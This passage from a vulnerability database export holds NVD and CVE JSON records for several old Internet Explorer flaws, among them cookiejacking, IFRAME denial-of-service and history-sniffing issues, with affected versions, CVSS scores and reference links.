"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v8 y versiones anteriores, y la beta de Internet Explorer v9, no restringen adecuadamente las acciones de arrastrar y soltar a trav\u00e9s de diferentes zonas de seguridad, lo que permite leer archivos de cookies a atacantes remotos asistidos por el usuario a trav\u00e9s de vectores que implican un elemento IFRAME con un atributo SRC que contiene una URL file:, como lo demuestra un juego de Facebook, relacionado con un problema de \"cookiejacking\"."
}
],
"id": "CVE-2011-2382",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2011-06-03T17:55:00.763",
"references": [
{
"source": "cve@mitre.org",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "cve@mitre.org",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "cve@mitre.org",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "cve@mitre.org",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "cve@mitre.org",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "cve@mitre.org",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "cve@mitre.org",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-2118
Vulnerability from fkie_nvd - Published: 2010-06-01 20:30 - Updated: 2025-04-11 00:51

| Vendor | Product | Version |
|---|---|---|
| microsoft | ie | 8.0.7600.16385 |
| microsoft | internet_explorer | 6.0.2900.2180 |

{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
},
{
"lang": "es",
"value": "Vulnerabilidad en Microsoft Internet Explorer v6.0.2900.2180 y v8.0.7600.16385 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento de recursos) a trav\u00e9s de c\u00f3digo JavaScript que contenga un bucle infinito que crea elementos IFRAME a URIs de tipo news://"
}
],
"id": "CVE-2010-2118",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2010-06-01T20:30:02.947",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-399"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-1991
Vulnerability from fkie_nvd - Published: 2010-05-20 17:30 - Updated: 2025-04-11 00:51

| Vendor | Product | Version |
|---|---|---|
| microsoft | ie | 8.0.7600.16385 |
| microsoft | internet_explorer | 6.0.2900.2180 |
| microsoft | internet_explorer | 7 |
| microsoft | internet_explorer | 7.0 |

{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v6.0.2900.2180, v7 y v8.0.7600.16385 ejecuta una aplicaci\u00f3n mail en situaciones d\u00f3nde un elemento IFRAME tiene un mailto: URL en su atributo SRC lo que permite a atacantes remotos provocar una denegaci\u00f3n del servicio (lanzamiento de demasiadas aplicaciones) a trav\u00e9s de un documento HTML con varios elementos IFRAME"
}
],
"id": "CVE-2010-1991",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2010-05-20T17:30:01.647",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-399"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2012-1545 (GCVE-0-2012-1545)
Vulnerability from cvelistv5 – Published: 2012-03-09 11:00 – Updated: 2024-09-17 02:01
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:01:02.832Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-03-09T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1545",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pwn2own.zerodayinitiative.com/status.html",
"refsource": "MISC",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"name": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars",
"refsource": "MISC",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"name": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621",
"refsource": "MISC",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"name": "http://twitter.com/vupen/statuses/177895844828291073",
"refsource": "MISC",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1545",
"datePublished": "2012-03-09T11:00:00Z",
"dateReserved": "2012-03-09T00:00:00Z",
"dateUpdated": "2024-09-17T02:01:01.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-5071 (GCVE-0-2010-5071)
Vulnerability from cvelistv5 – Published: 2011-12-07 19:00 – Updated: 2024-09-16 23:31
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T04:09:38.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-12-07T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-5071",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-5071",
"datePublished": "2011-12-07T19:00:00Z",
"dateReserved": "2011-12-07T00:00:00Z",
"dateUpdated": "2024-09-16T23:31:42.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2435 (GCVE-0-2002-2435)
Vulnerability from cvelistv5 – Published: 2011-12-07 19:00 – Updated: 2024-08-08 04:06- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T04:06:54.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-06-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2435",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"name": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777",
"refsource": "MISC",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2435",
"datePublished": "2011-12-07T19:00:00",
"dateReserved": "2011-12-07T00:00:00",
"dateUpdated": "2024-08-08T04:06:54.637Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2383 (GCVE-0-2011-2383)
Vulnerability from cvelistv5 – Published: 2011-06-03 17:00 – Updated: 2024-08-06 23:00- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS",
"x_transferred"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-05-20T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-12T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
